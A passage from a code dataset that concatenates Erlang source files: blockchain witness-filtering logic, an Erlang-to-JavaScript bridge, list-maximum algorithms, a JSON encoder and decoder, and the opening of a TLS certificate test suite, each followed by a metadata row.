end,
Witnesses),
maps:map(fun(WitnessPubkeyBin, _Witness) ->
case maps:get(WitnessPubkeyBin, TotalRSSIs) of
0 ->
%% No RSSIs at all, default to 1.0
1.0;
S ->
%% Scale and invert this prob
?normalize_float((1 - ?normalize_float(S/lists:sum(maps:values(TotalRSSIs)), Vars)), Vars)
end
end, Witnesses).
-spec witness_rssi_centrality_probs(Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
Vars :: map()) -> prob_map().
witness_rssi_centrality_probs(Witnesses, _Vars) when map_size(Witnesses) == 1 ->
assign_single_witness_prob(Witnesses);
witness_rssi_centrality_probs(Witnesses, Vars) ->
maps:map(fun(_WitnessPubkeyBin, Witness) ->
try
blockchain_ledger_gateway_v2:witness_hist(Witness)
of
Hist ->
%% The closer these values are to 0.0, the more confident we
%% are that this witness has a reasonable looking RSSI, therefore
%% we bias _for_ picking that witness
{MaxMetric, MeanMetric} = centrality_metrics(Hist, Vars),
blockchain_utils:normalize_float((1 - MaxMetric) * (1 - MeanMetric))
catch
error:no_histogram ->
0.0
end
end,
Witnesses).
-spec filter_witnesses(GatewayLoc :: h3:h3_index(),
Indices :: [h3:h3_index()],
Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
Ledger :: blockchain:ledger(),
Vars :: map()) -> blockchain_ledger_gateway_v2:witnesses().
filter_witnesses(GatewayLoc, Indices, Witnesses, Ledger, Vars) ->
{ok, Height} = blockchain_ledger_v1:current_height(Ledger),
ParentRes = parent_res(Vars),
ExclusionCells = exclusion_cells(Vars),
GatewayParent = h3:parent(GatewayLoc, ParentRes),
ParentIndices = [h3:parent(Index, ParentRes) || Index <- Indices],
maps:filter(fun(WitnessPubkeyBin, Witness) ->
WitnessGw = find(WitnessPubkeyBin, Ledger),
case is_witness_stale(WitnessGw, Height, Vars) of
true ->
false;
false ->
WitnessLoc = blockchain_ledger_gateway_v2:location(WitnessGw),
WitnessParent = h3:parent(WitnessLoc, ParentRes),
%% check the GW is allowed to witness, if not they dont do all the other checks
case blockchain_ledger_gateway_v2:is_valid_capability(WitnessGw, ?GW_CAPABILITY_POC_WITNESS, Ledger) of
false -> false;
true ->
%% Dont include any witnesses in any parent cell we've already visited
not(lists:member(WitnessLoc, Indices)) andalso
%% Don't include any witness whose parent is the same as the gateway we're looking at
(GatewayParent /= WitnessParent) andalso
%% Don't include any witness whose parent is too close to any of the indices we've already seen
check_witness_distance(WitnessParent, ParentIndices, ExclusionCells) andalso
%% Don't include any witness who have a bad rssi
check_witness_bad_rssi(Witness, Vars) andalso
%% Don't include any witness who have bad rssi range
check_witness_bad_rssi_centrality(Witness, Vars) andalso
%% Don't include any witness who are too far from the current gateway
check_witness_too_far(WitnessLoc, GatewayLoc, Vars)
end
end
end,
Witnesses).
-spec check_witness_too_far(WitnessLoc :: h3:h3_index(),
GatewayLoc :: h3:h3_index(),
Vars :: map()) -> boolean().
check_witness_too_far(WitnessLoc, GatewayLoc, Vars) ->
POCMaxHopCells = poc_max_hop_cells(Vars),
try h3:grid_distance(WitnessLoc, GatewayLoc) of
Res ->
Res < POCMaxHopCells
catch
%% Grid distance may badarg because of pentagonal distortion or
%% non matching resolutions or just being too far.
%% In either of those cases, we assume that the gateway
%% is potentially illegitimate to be a target.
_:_ -> false
end.
-spec check_witness_distance(WitnessParent :: h3:h3_index(),
ParentIndices :: [h3:h3_index()],
ExclusionCells :: pos_integer()) -> boolean().
check_witness_distance(WitnessParent, ParentIndices, ExclusionCells) ->
not(lists:any(fun(ParentIndex) ->
try h3:grid_distance(WitnessParent, ParentIndex) < ExclusionCells of
Res -> Res
catch
%% Grid distance may badarg because of pentagonal distortion or
%% non matching resolutions or just being too far.
%% In either of those cases, we assume that the gateway
%% is potentially legitimate to be a target.
_:_ -> true
end
end, ParentIndices)).
-spec check_witness_bad_rssi(Witness :: blockchain_ledger_gateway_v2:gateway_witness(),
Vars :: map()) -> boolean().
check_witness_bad_rssi(Witness, Vars) ->
case poc_version(Vars) of
V when is_integer(V), V > 4 ->
try
blockchain_ledger_gateway_v2:witness_hist(Witness)
of
Hist ->
case maps:get(28, Hist, 0) of
0 ->
%% No bad RSSIs found, include
true;
BadCount when is_integer(V), V > 5 ->
%% Activate with PoC v6
%% Check that the bad rssi count is less than
%% the sum of other known good rssi
BadCount < lists:sum(maps:values(maps:without([28], Hist)));
BadCount ->
%% If the bad RSSI count does not dominate
%% the overall RSSIs this witness has, include,
%% otherwise exclude
BadCount < lists:sum(maps:values(Hist))
end
catch
error:no_histogram ->
%% No histogram found, include
true
end;
_ ->
true
end.
-spec check_witness_bad_rssi_centrality(Witness :: blockchain_ledger_gateway_v2:gateway_witness(),
Vars :: map()) -> boolean().
check_witness_bad_rssi_centrality(Witness, Vars) ->
try
blockchain_ledger_gateway_v2:witness_hist(Witness)
of
Hist ->
case centrality_metrics(Hist, Vars) of
%% TODO: Check more conditions?
%% Check whether the ratio of maxbad/maxgood or meanbad/meangood exceeds 1.0
%% If so, we exclude that witness
{M1, M2} when M1 >= 1.0 orelse M2 >= 1.0 ->
false;
_ ->
true
end
catch
error:no_histogram ->
false
end.
-spec is_witness_stale(Gateway :: blockchain_ledger_gateway_v2:gateway(),
Height :: pos_integer(),
Vars :: map()) -> boolean().
is_witness_stale(Gateway, Height, Vars) ->
case blockchain_ledger_gateway_v2:last_poc_challenge(Gateway) of
undefined ->
%% No POC challenge, don't include
true;
C ->
%% Check challenge age is recent depending on the set chain var
(Height - C) >= challenge_age(Vars)
end.
-spec rssi_weight(Vars :: map()) -> float().
rssi_weight(Vars) ->
maps:get(poc_v4_prob_rssi_wt, Vars).
-spec time_weight(Vars :: map()) -> float().
time_weight(Vars) ->
maps:get(poc_v4_prob_time_wt, Vars).
-spec count_weight(Vars :: map()) -> float().
count_weight(Vars) ->
maps:get(poc_v4_prob_count_wt, Vars).
-spec prob_no_rssi(Vars :: map()) -> float().
prob_no_rssi(Vars) ->
maps:get(poc_v4_prob_no_rssi, Vars).
-spec prob_good_rssi(Vars :: map()) -> float().
prob_good_rssi(Vars) ->
maps:get(poc_v4_prob_good_rssi, Vars).
-spec prob_bad_rssi(Vars :: map()) -> float().
prob_bad_rssi(Vars) ->
maps:get(poc_v4_prob_bad_rssi, Vars).
-spec parent_res(Vars :: map()) -> pos_integer().
parent_res(Vars) ->
maps:get(poc_v4_parent_res, Vars).
-spec exclusion_cells(Vars :: map()) -> pos_integer().
exclusion_cells(Vars) ->
maps:get(poc_v4_exclusion_cells, Vars).
-spec nanosecond_time(Time :: integer()) -> integer().
nanosecond_time(Time) ->
erlang:convert_time_unit(Time, millisecond, nanosecond).
-spec randomness_wt(Vars :: map()) -> float().
randomness_wt(Vars) ->
maps:get(poc_v4_randomness_wt, Vars).
-spec centrality_wt(Vars :: map()) -> float().
centrality_wt(Vars) ->
maps:get(poc_centrality_wt, Vars).
-spec poc_version(Vars :: map()) -> pos_integer().
poc_version(Vars) ->
maps:get(poc_version, Vars).
-spec challenge_age(Vars :: map()) -> pos_integer().
challenge_age(Vars) ->
maps:get(poc_v4_target_challenge_age, Vars).
-spec poc_good_bucket_low(Vars :: map()) -> integer().
poc_good_bucket_low(Vars) ->
maps:get(poc_good_bucket_low, Vars).
-spec poc_good_bucket_high(Vars :: map()) -> integer().
poc_good_bucket_high(Vars) ->
maps:get(poc_good_bucket_high, Vars).
-spec poc_max_hop_cells(Vars :: map()) -> integer().
poc_max_hop_cells(Vars) ->
maps:get(poc_max_hop_cells, Vars).
%% ==================================================================
%% Helper Functions
%% ==================================================================
%% we assume that everything that has made it into build has already
%% been asserted, and thus the lookup will never fail. This function
%% in no way exists simply because
%% blockchain_gateway_cache:get is too much to type a bunch
%% of times.
-spec find(libp2p_crypto:pubkey_bin(), blockchain_ledger_v1:ledger()) -> blockchain_ledger_gateway_v2:gateway().
find(Addr, Ledger) ->
{ok, Gw} = blockchain_gateway_cache:get(Addr, Ledger),
Gw.
-spec split_hist(Hist :: blockchain_ledger_gateway_v2:histogram(),
Vars :: map()) -> {blockchain_ledger_gateway_v2:histogram(),
blockchain_ledger_gateway_v2:histogram()}.
split_hist(Hist, Vars) ->
GoodBucketLow = poc_good_bucket_low(Vars),
GoodBucketHigh = poc_good_bucket_high(Vars),
%% Split the histogram into two buckets
GoodBucket = maps:filter(fun(Bucket, _) ->
lists:member(Bucket, lists:seq(GoodBucketLow, GoodBucketHigh))
end,
Hist),
BadBucket = maps:without(maps:keys(GoodBucket), Hist),
{GoodBucket, BadBucket}.
%%%-----------------------------------------------------------------------------
%%% @doc Check whether the range of RSSI values lie within acceptable bounds
%%%-----------------------------------------------------------------------------
-spec centrality_metrics(Hist :: blockchain_ledger_gateway_v2:histogram(),
Vars :: map()) -> {float(), float()}.
centrality_metrics(Hist, Vars) ->
{GoodBucket, BadBucket} = split_hist(Hist, Vars),
GoodBucketValues = maps:values(GoodBucket),
BadBucketValues = maps:values(BadBucket),
SG0 = lists:sum(GoodBucketValues),
SB0 = lists:sum(BadBucketValues),
case {SG0, SB0} of
{SG, SB} when SG > 0 andalso SB > 0 ->
MaxGood = lists:max(GoodBucketValues),
MaxBad = lists:max(BadBucketValues),
MeanGood = blockchain_utils:normalize_float(lists:sum(GoodBucketValues) / length(GoodBucketValues)),
MeanBad = blockchain_utils:normalize_float(lists:sum(BadBucketValues) / length(BadBucketValues)),
MaxMetric = blockchain_utils:normalize_float(MaxBad / MaxGood),
MeanMetric = blockchain_utils:normalize_float(MeanBad / MeanGood),
%% If either of these two become >= 1.0, we are certain that
%% either the witnessing is too close or inconclusive at best.
{MaxMetric, MeanMetric};
{SG, 0} when SG > 0 ->
%% nothing in bad bucket
{0.0, 0.0};
_ ->
%% Everything else is considered bad
{1.0, 1.0}
end.
-spec is_legit_rssi_dominating(Witness :: blockchain_ledger_gateway_v2:gateway_witness()) -> boolean().
is_legit_rssi_dominating(Witness) ->
try
blockchain_ledger_gateway_v2:witness_hist(Witness)
of
Hist ->
lists:sum(maps:values(maps:without([28], Hist))) > maps:get(28, Hist)
catch
error:no_histogram ->
false
end.
-spec assign_single_witness_prob(Witnesses :: blockchain_ledger_gateway_v2:witnesses()) -> prob_map().
assign_single_witness_prob(Witnesses) ->
maps:map(fun(_WitnessPubkeyBin, Witness) ->
case is_legit_rssi_dominating(Witness) of
true ->
%% There is only a single witness with dominating legit RSSIs
1.0;
false ->
%% All bad RSSIs for this single witness
0.0
end
end,
Witnesses).
limit_witnesses(#{?poc_witness_consideration_limit := Limit}, RandState, Witnesses0) ->
Witnesses = maps:to_list(Witnesses0),
{RandState1, SubSet} = blockchain_utils:deterministic_subset(Limit, RandState, Witnesses),
{RandState1, maps:from_list(SubSet)};
limit_witnesses(_Vars, RandState, Witnesses) ->
{RandState, Witnesses}. | src/poc/blockchain_poc_path_v4.erl | 0.564579 | 0.578567 | blockchain_poc_path_v4.erl | starcoder |
%% @author <NAME> <<EMAIL>>
%% @copyright 2009-2010 Basho Technologies
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% @doc Convenience module for interacting with Javascript from Erlang.
%% The functions provided by this module marshal bindings and function
%% args into JSON before sending them to Javascript. While this does
%% incur a certain amount of overhead it has the benefit of (mostly)
%% preserving types as they roundtrip between Erlang and Javascript.
%% Of course, this also means all Erlang values MUST BE convertable
%% into JSON. In practice, this is less restricting than it sounds.
-module(js).
-export([define/2, define/3, eval/2, call/3, call/4]).
%% @spec define(port(), binary()) -> ok | {error, any()}
%% @doc Define one or more Javascript expressions.
define(Ctx, Js) ->
define(Ctx, Js, []).
%% @spec define(port(), binary(), list(any())) -> ok | {error, any()}
%% @doc Define one or more Javascript expressions using a set of bindings. Bindings
%% are useful when the expressions use closures.
define(Ctx, Js, Bindings) ->
JsBindings = list_to_binary(build_bindings(Bindings, [])),
FinalJs = iolist_to_binary([JsBindings, Js]),
js_driver:define_js(Ctx, FinalJs).
%% @spec eval(port(), binary()) -> {ok, any()} | {error, any()}
%% @doc Evaluate one or more Javascript expressions and return the results
eval(Ctx, Js) ->
js_driver:eval_js(Ctx, Js).
%% @spec call(port(), binary(), list(any())) -> {ok, Result} | {error, any()}
%% @doc Call a function by name with a list of arguments. This is roughly the
%% same as apply in most other languages.
call(Ctx, FunctionName, Args) ->
call(Ctx, FunctionName, Args, []).
%% @spec call(port(), binary(), list(any()), list(any())) -> {ok, Result} | {error, any()}
%% @doc Call a function by name with a list of arguments and environmental bindings. Bindings
%% behave just like define/3.
call(Ctx, FunctionName, Args, Bindings) ->
JsBindings = list_to_binary(build_bindings(Bindings, [])),
ArgList = build_arg_list(Args, []),
EscapedFunctionName = binary:replace(FunctionName, <<"\"">>, <<"\\\"">>, [global]),
Js = iolist_to_binary([<<"function() {">>, JsBindings, <<" if (">>, FunctionName, <<" === undefined) { throw(\"">>,
EscapedFunctionName, <<" not defined\"); } ">>,
<<"return ">>, FunctionName, <<"(">>, ArgList, <<");">>, <<"}();">>]),
js_driver:eval_js(Ctx, Js).
%% Internal functions
build_bindings([], Accum) ->
Accum;
build_bindings([{VarName, Value}|T], Accum) ->
FinalVarName = case is_atom(VarName) of
true ->
atom_to_list(VarName);
false ->
VarName
end,
build_bindings(T, [[FinalVarName, "=", js_mochijson2:encode(Value), ";"]|Accum]).
build_arg_list([], Accum) ->
lists:reverse(Accum);
build_arg_list([H|[]], Accum) ->
build_arg_list([], [js_mochijson2:encode(H)|Accum]);
build_arg_list([H|T], Accum) ->
build_arg_list(T, [[js_mochijson2:encode(H), ","]|Accum]). | deps/erlang_js/src/js.erl | 0.591723 | 0.450843 | js.erl | starcoder |
-module(max).
-export([maximum/1, maxdc/1, maxdc2/1, maxdc_tail/1, maxdc_tail2/1]).
-include_lib("eunit/include/eunit.hrl").
-include("./include/testcase.01.hrl").
-import(split2, [split/1]).
%%% Providing 5 different implementaions
%% simple implementation in tail recursion (The fastest!).
maximum([]) ->
'List is empty';
maximum([H|T]) ->
maximum(T, H).
maximum([], Mx) ->
Mx;
maximum([H|T], Mx) ->
maximum(T, max(H, Mx)).
%% Implement divide and conquer algorithm; using erlang:max and max:maximum; does not scale for very big lists ~ 10^5 elements
maxdc([]) ->
'List is empty';
maxdc(L) ->
{[HFh|TFh], [HSh|TSh]} = lists:split(trunc(length(L)/2), L),
max(maximum(TFh, HFh), maximum(TSh, HSh)).
%% Implement divide and conquer algorithm in tail recursion
maxdc_tail([])->
'List is empty';
maxdc_tail(L) ->
maxdc_tail(L, 0).
maxdc_tail([], M1) ->
M1;
maxdc_tail(L, M1) ->
{L1, L2} = lists:split(trunc(length(L)/2), L),
case {L1, L2} of
{[], []}->
M1;
{[], [H2|T2]} ->
max(M1, maxdc_tail(T2, max(M1, H2)));
{[H1|T1], []} ->
max(M1, maxdc_tail(T1, max(M1, H1)));
{[HFh|TFh], [HSh|TSh]} ->
max(maxdc_tail(TFh, max(M1, HFh)), maxdc_tail(TSh, max(M1, HSh)))
end.
%% Implement divide and conquer algorithm in tail recursion with 2 accumulators
maxdc_tail2([])->
'List is empty';
maxdc_tail2(L) ->
maxdc_tail2(L, 0, 0).
maxdc_tail2([], M1, M2) ->
max(M1, M2);
maxdc_tail2(L, M1, M2) ->
%{L1, L2} = lists:split(trunc(length(L)/2), L),
{L1, L2} = split2:split(L),
case {L1, L2} of
{[], []}->
maxdc_tail2([], M1, M2);
{[], [H2|T2]} ->
maxdc_tail2([], M1, maxdc_tail2(T2, M1, max(M2, H2)));
{[H1|T1], []} ->
maxdc_tail2(T1, max(M1, H1), M2);
{[HFh|TFh], [HSh|TSh]} ->
maxdc_tail2(TFh, max(M1, HFh), maxdc_tail2(TSh, M1, max(M2, HSh)))
end.
%% Implement divide and conquer algorithm; Utilises erlang:max.
maxdc2([]) ->
'list is empty';
maxdc2([X|[]]) ->
X;
maxdc2(L) ->
%{Left, Right} = split2:split(L),
{Left, Right} = lists:split(trunc(length(L)/2), L),
max(maxdc2(Left), maxdc2(Right)). | list/search/maximum/max.erl | 0.514156 | 0.528594 | max.erl | starcoder |
%% JSON - RFC 4627 - for Erlang
%%---------------------------------------------------------------------------
%% Copyright (c) 2007 <NAME> <<EMAIL>>
%% Copyright (c) 2007 LShift Ltd. <<EMAIL>>
%%
%% Permission is hereby granted, free of charge, to any person
%% obtaining a copy of this software and associated documentation
%% files (the "Software"), to deal in the Software without
%% restriction, including without limitation the rights to use, copy,
%% modify, merge, publish, distribute, sublicense, and/or sell copies
%% of the Software, and to permit persons to whom the Software is
%% furnished to do so, subject to the following conditions:
%%
%% The above copyright notice and this permission notice shall be
%% included in all copies or substantial portions of the Software.
%%
%% THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
%% EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
%% MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
%% NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
%% BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
%% ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
%% CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
%% SOFTWARE.
%%---------------------------------------------------------------------------
%%
%% encode(val()) -> str()
%% decode(str()) -> {ok, val(), str()} | {error, Reason}
%% where Reason is usually far too much information
%% and should be ignored.
%%
%% Data type mapping as per Joe Armstrong's message
%% http://www.erlang.org/ml-archive/erlang-questions/200511/msg00193.html:
%%
%% JSON Obj = type obj() = {obj, [{key(), val()}]}
%% JSON Array = type array() = [val()]
%% JSON Number = type num() = int() | float()
%% JSON String = type str() = bin()
%% JSON true false null = true, false null (atoms)
%% With Type val() = obj() | array() | num() | str() | true | false | null
%%
%% and key() being a str(). (Or a binary or atom, during JSON encoding.)
%%
%% No unicode processing is done other than minimal \uXXXX parsing and generation.
%%
%% I'm lenient in the following ways during parsing:
%% - repeated commas in arrays and objects collapse to a single comma
%% - characters =<32 or >127 that somehow appear in the input stream
%% inside a string are silently accepted unchanged
%% - any character =<32 is considered whitespace
%% - leading zeros for numbers are accepted
-module(json).
-export([mime_type/0, encode/1, encode/2, decode/1]).
-export([from_record/3, to_record/3]).
-export([hex_digit/1, digit_hex/1]).
mime_type() ->
"application/json".
encode(X) ->
lists:reverse(encode(X, [])).
encode(true, Acc) ->
"eurt" ++ Acc;
encode(false, Acc) ->
"eslaf" ++ Acc;
encode(null, Acc) ->
"llun" ++ Acc;
encode(Str, Acc) when is_binary(Str) ->
quote_and_encode_string(binary_to_list(Str), Acc);
encode(Str, Acc) when is_atom(Str) ->
quote_and_encode_string(atom_to_list(Str), Acc);
encode(Num, Acc) when is_number(Num) ->
encode_number(Num, Acc);
encode({obj, Fields}, Acc) ->
"}" ++ encode_object(Fields, "{" ++ Acc);
% Tuple case added by Ville
encode(Str, Acc) when is_tuple(Str) ->
encode(tuple_to_list(Str), Acc);
encode(Arr, Acc) when is_list(Arr) ->
"]" ++ encode_array(Arr, "[" ++ Acc).
encode_object([], Acc) ->
Acc;
encode_object([{Key, Value}], Acc) ->
encode_field(Key, Value, Acc);
encode_object([{Key, Value} | Rest], Acc) ->
encode_object(Rest, "," ++ encode_field(Key, Value, Acc)).
encode_field(Key, Value, Acc) when is_binary(Key) ->
encode(Value, ":" ++ quote_and_encode_string(binary_to_list(Key), Acc));
encode_field(Key, Value, Acc) when is_atom(Key) ->
encode(Value, ":" ++ quote_and_encode_string(atom_to_list(Key), Acc));
encode_field(Key, Value, Acc) when is_list(Key) ->
encode(Value, ":" ++ quote_and_encode_string(Key, Acc)).
encode_array([], Acc) ->
Acc;
encode_array([X], Acc) ->
encode(X, Acc);
encode_array([X | Rest], Acc) ->
encode_array(Rest, "," ++ encode(X, Acc)).
quote_and_encode_string(Str, Acc) ->
"\"" ++ encode_string(Str, "\"" ++ Acc).
encode_string([], Acc) ->
Acc;
encode_string([$" | Rest], Acc) ->
encode_string(Rest, [$", $\\ | Acc]);
encode_string([$\\ | Rest], Acc) ->
encode_string(Rest, [$\\, $\\ | Acc]);
encode_string([X | Rest], Acc) when X < 32 orelse X > 127 ->
encode_string(Rest, encode_general_char(X, Acc));
encode_string([X | Rest], Acc) ->
encode_string(Rest, [X | Acc]).
encode_general_char(8, Acc) -> [$b, $\\ | Acc];
encode_general_char(9, Acc) -> [$t, $\\ | Acc];
encode_general_char(10, Acc) -> [$n, $\\ | Acc];
encode_general_char(12, Acc) -> [$f, $\\ | Acc];
encode_general_char(13, Acc) -> [$r, $\\ | Acc];
encode_general_char(X, Acc) ->
[hex_digit((X) band 16#F),
hex_digit((X bsr 4) band 16#F),
hex_digit((X bsr 8) band 16#F),
hex_digit((X bsr 12) band 16#F),
$u,
$\\ | Acc].
hex_digit(0) -> $0;
hex_digit(1) -> $1;
hex_digit(2) -> $2;
hex_digit(3) -> $3;
hex_digit(4) -> $4;
hex_digit(5) -> $5;
hex_digit(6) -> $6;
hex_digit(7) -> $7;
hex_digit(8) -> $8;
hex_digit(9) -> $9;
hex_digit(10) -> $A;
hex_digit(11) -> $B;
hex_digit(12) -> $C;
hex_digit(13) -> $D;
hex_digit(14) -> $E;
hex_digit(15) -> $F.
encode_number(Num, Acc) when is_integer(Num) ->
lists:reverse(integer_to_list(Num), Acc);
encode_number(Num, Acc) when is_float(Num) ->
lists:reverse(float_to_list(Num), Acc).
decode(Bin) when is_binary(Bin) ->
decode(binary_to_list(Bin));
decode(Chars) ->
case catch parse(skipws(Chars)) of
{'EXIT', Reason} ->
%% Reason is usually far too much information, but helps
%% if needing to debug this module.
{error, Reason};
{Value, Remaining} ->
{ok, Value, skipws(Remaining)}
end.
parse([$" | Rest]) -> %% " emacs balancing
{Str, Rest1} = parse_string(Rest, []),
{list_to_binary(Str), Rest1};
parse("true" ++ Rest) -> {true, Rest};
parse("false" ++ Rest) -> {false, Rest};
parse("null" ++ Rest) -> {null, Rest};
parse([${ | Rest]) -> parse_object(skipws(Rest), []);
parse([$[ | Rest]) -> parse_array(skipws(Rest), []);
parse(Chars) -> parse_number(Chars, []).
skipws([X | Rest]) when X =< 32 ->
skipws(Rest);
skipws(Chars) ->
Chars.
parse_string([$" | Rest], Acc) -> %% " emacs balancing
{lists:reverse(Acc), Rest};
parse_string([$\\, Key | Rest], Acc) ->
parse_general_char(Key, Rest, Acc);
parse_string([X | Rest], Acc) ->
parse_string(Rest, [X | Acc]).
parse_general_char($b, Rest, Acc) -> parse_string(Rest, [8 | Acc]);
parse_general_char($t, Rest, Acc) -> parse_string(Rest, [9 | Acc]);
parse_general_char($n, Rest, Acc) -> parse_string(Rest, [10 | Acc]);
parse_general_char($f, Rest, Acc) -> parse_string(Rest, [12 | Acc]);
parse_general_char($r, Rest, Acc) -> parse_string(Rest, [13 | Acc]);
parse_general_char($/, Rest, Acc) -> parse_string(Rest, [$/ | Acc]);
parse_general_char($\\, Rest, Acc) -> parse_string(Rest, [$\\ | Acc]);
parse_general_char($", Rest, Acc) -> parse_string(Rest, [$" | Acc]);
parse_general_char($u, [D0, D1, D2, D3 | Rest], Acc) ->
parse_string(Rest, [(digit_hex(D0) bsl 12) +
(digit_hex(D1) bsl 8) +
(digit_hex(D2) bsl 4) +
(digit_hex(D3)) | Acc]).
digit_hex($0) -> 0;
digit_hex($1) -> 1;
digit_hex($2) -> 2;
digit_hex($3) -> 3;
digit_hex($4) -> 4;
digit_hex($5) -> 5;
digit_hex($6) -> 6;
digit_hex($7) -> 7;
digit_hex($8) -> 8;
digit_hex($9) -> 9;
digit_hex($A) -> 10;
digit_hex($B) -> 11;
digit_hex($C) -> 12;
digit_hex($D) -> 13;
digit_hex($E) -> 14;
digit_hex($F) -> 15;
digit_hex($a) -> 10;
digit_hex($b) -> 11;
digit_hex($c) -> 12;
digit_hex($d) -> 13;
digit_hex($e) -> 14;
digit_hex($f) -> 15.
finish_number(Acc, Rest) ->
Str = lists:reverse(Acc),
{case catch list_to_integer(Str) of
{'EXIT', _} -> list_to_float(Str);
Value -> Value
end, Rest}.
parse_number([], _Acc) ->
exit(syntax_error);
parse_number([$- | Rest], Acc) ->
parse_number1(Rest, [$- | Acc]);
parse_number(Rest, Acc) ->
parse_number1(Rest, Acc).
parse_number1(Rest, Acc) ->
{Acc1, Rest1} = parse_int_part(Rest, Acc),
case Rest1 of
[] -> finish_number(Acc1, []);
[$. | More] ->
{Acc2, Rest2} = parse_int_part(More, [$. | Acc1]),
parse_exp(Rest2, Acc2, false);
_ ->
parse_exp(Rest1, Acc1, true)
end.
parse_int_part(Chars = [_Ch | _Rest], Acc) ->
parse_int_part0(Chars, Acc).
parse_int_part0([], Acc) ->
{Acc, []};
parse_int_part0([Ch | Rest], Acc) ->
case is_digit(Ch) of
true -> parse_int_part0(Rest, [Ch | Acc]);
false -> {Acc, [Ch | Rest]}
end.
parse_exp([$e | Rest], Acc, NeedFrac) ->
parse_exp1(Rest, Acc, NeedFrac);
parse_exp([$E | Rest], Acc, NeedFrac) ->
parse_exp1(Rest, Acc, NeedFrac);
parse_exp(Rest, Acc, _NeedFrac) ->
finish_number(Acc, Rest).
parse_exp1(Rest, Acc, NeedFrac) ->
{Acc1, Rest1} = parse_signed_int_part(Rest, if
NeedFrac -> [$e, $0, $. | Acc];
true -> [$e | Acc]
end),
finish_number(Acc1, Rest1).
parse_signed_int_part([$+ | Rest], Acc) ->
parse_int_part(Rest, [$+ | Acc]);
parse_signed_int_part([$- | Rest], Acc) ->
parse_int_part(Rest, [$- | Acc]);
parse_signed_int_part(Rest, Acc) ->
parse_int_part(Rest, Acc).
is_digit($0) -> true;
is_digit($1) -> true;
is_digit($2) -> true;
is_digit($3) -> true;
is_digit($4) -> true;
is_digit($5) -> true;
is_digit($6) -> true;
is_digit($7) -> true;
is_digit($8) -> true;
is_digit($9) -> true;
is_digit(_) -> false.
parse_object([$} | Rest], Acc) ->
{{obj, lists:reverse(Acc)}, Rest};
parse_object([$, | Rest], Acc) ->
parse_object(skipws(Rest), Acc);
parse_object([$" | Rest], Acc) -> %% " emacs balancing
{Key, Rest1} = parse_string(Rest, []),
[$: | Rest2] = skipws(Rest1),
{Value, Rest3} = parse(skipws(Rest2)),
parse_object(skipws(Rest3), [{Key, Value} | Acc]).
parse_array([$] | Rest], Acc) ->
{lists:reverse(Acc), Rest};
parse_array([$, | Rest], Acc) ->
parse_array(skipws(Rest), Acc);
parse_array(Chars, Acc) ->
{Value, Rest} = parse(Chars),
parse_array(skipws(Rest), [Value | Acc]).
from_record(R, _RName, Fields) ->
{obj, encode_record_fields(R, 2, Fields)}.
encode_record_fields(_R, _Index, []) ->
[];
encode_record_fields(R, Index, [Field | Rest]) ->
case element(Index, R) of
undefined ->
encode_record_fields(R, Index + 1, Rest);
Value ->
[{atom_to_list(Field), Value} | encode_record_fields(R, Index + 1, Rest)]
end.
to_record({obj, Values}, Fallback, Fields) ->
list_to_tuple([element(1, Fallback) | decode_record_fields(Values, Fallback, 2, Fields)]).
decode_record_fields(_Values, _Fallback, _Index, []) ->
[];
decode_record_fields(Values, Fallback, Index, [Field | Rest]) ->
[case lists:keysearch(atom_to_list(Field), 1, Values) of
{value, {_, Value}} ->
Value;
false ->
element(Index, Fallback)
end | decode_record_fields(Values, Fallback, Index + 1, Rest)]. | ringogw/src/json.erl | 0.615088 | 0.448728 | json.erl | starcoder |
%% Copyright (c) 2020-2022 <NAME>
%%
%% Permission is hereby granted, free of charge, to any person obtaining a
%% copy of this software and associated documentation files (the "Software"),
%% to deal in the Software without restriction, including without limitation
%% the rights to use, copy, modify, merge, publish, distribute, sublicense,
%% and/or sell copies of the Software, and to permit persons to whom the
%% Software is furnished to do so, subject to the following conditions:
%%
%% The above copyright notice and this permission notice shall be included in
%% all copies or substantial portions of the Software.
%%
%% THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
%% IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
%% FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
%% AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
%% LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
%% FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
%% DEALINGS IN THE SOFTWARE.
-module(tls_certificate_check_options_SUITE).
-compile(export_all).
-include_lib("stdlib/include/assert.hrl").
%% ------------------------------------------------------------------
%% Macros
%% ------------------------------------------------------------------
-define(PEMS_PATH, "../../../../test/common_scenarios").
%% ------------------------------------------------------------------
%% Setup
%% ------------------------------------------------------------------
all() ->
[real_certificate_test,
good_certificate_test,
expired_certificate_test,
future_certificate_test,
wrong_host_certificate_test,
self_signed_certificate_test,
unknown_ca_test,
misordered_chain_test].
init_per_suite(Config) ->
{ok, _} = application:ensure_all_started(tls_certificate_check),
Config.
end_per_suite(_Config) ->
ok = application:stop(tls_certificate_check).
%% ------------------------------------------------------------------
%% Test Cases
%% ------------------------------------------------------------------
real_certificate_test(_Config) ->
{ok, _} = application:ensure_all_started(inets),
try
URLs = shuffle_list(["https://example.com",
"https://google.com",
"https://microsoft.com"]),
real_certificate_test_recur(URLs)
after
application:stop(inets)
end.
good_certificate_test(_Config) ->
